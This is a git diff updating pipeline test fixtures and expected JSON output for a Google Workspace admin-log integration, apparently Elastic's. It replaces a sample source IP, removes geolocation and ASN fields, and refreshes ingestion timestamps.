@@ -1532,35 +1208,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351406400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:53.079640400Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ENFORCE_STRONG_AUTHENTICATION", "id": "1", @@ -1591,7 +1249,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1613,35 +1271,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351408200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079646700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS", "id": "1", 
@@ -1664,31 +1304,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1702,7 +1324,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1726,8 +1348,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:25.351411200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079652900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED", "id": "1", @@ -1765,7 +1387,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1789,35 +1411,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351413200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079659200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "SESSION_CONTROL_SETTINGS_CHANGE", 
"id": "1", @@ -1848,7 +1452,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1870,35 +1474,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351414900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079665Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_SESSION_LENGTH", "id": "1", @@ -1929,7 +1515,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1955,35 +1541,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351416700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079670600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNBLOCK_ON_DEVICE_ACCESS", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log index ff07d024c4c..f720ee9d408 100644 
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log 
@@ -1,5 +1,5 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json
index 9de2c7d4f0c..502bc0e559d 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json
@@ -2,31 +2,13 @@
 "expected": [
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "url": {
 "path": "/path/in/url"
@@ -43,7 +25,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -63,8 +45,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.128853900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:56.332587700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "ADD_WEB_ADDRESS",
 "id": "1",
@@ -83,31 +65,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "url": {
 "path": "/path/in/url"
@@ -124,7 +88,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -144,8 +108,8 @@
 "id": "1"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.128862200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:56.332595800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "DELETE_WEB_ADDRESS",
 "id": "1",
@@ -172,7 +136,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -196,35 +160,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.128864400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:56.332601300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_SITES_SETTING",
 "id": "1",
@@ -255,7 +201,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -279,35 +225,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.128866200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}",
+ "ingested": "2021-12-09T13:38:56.332606600Z",
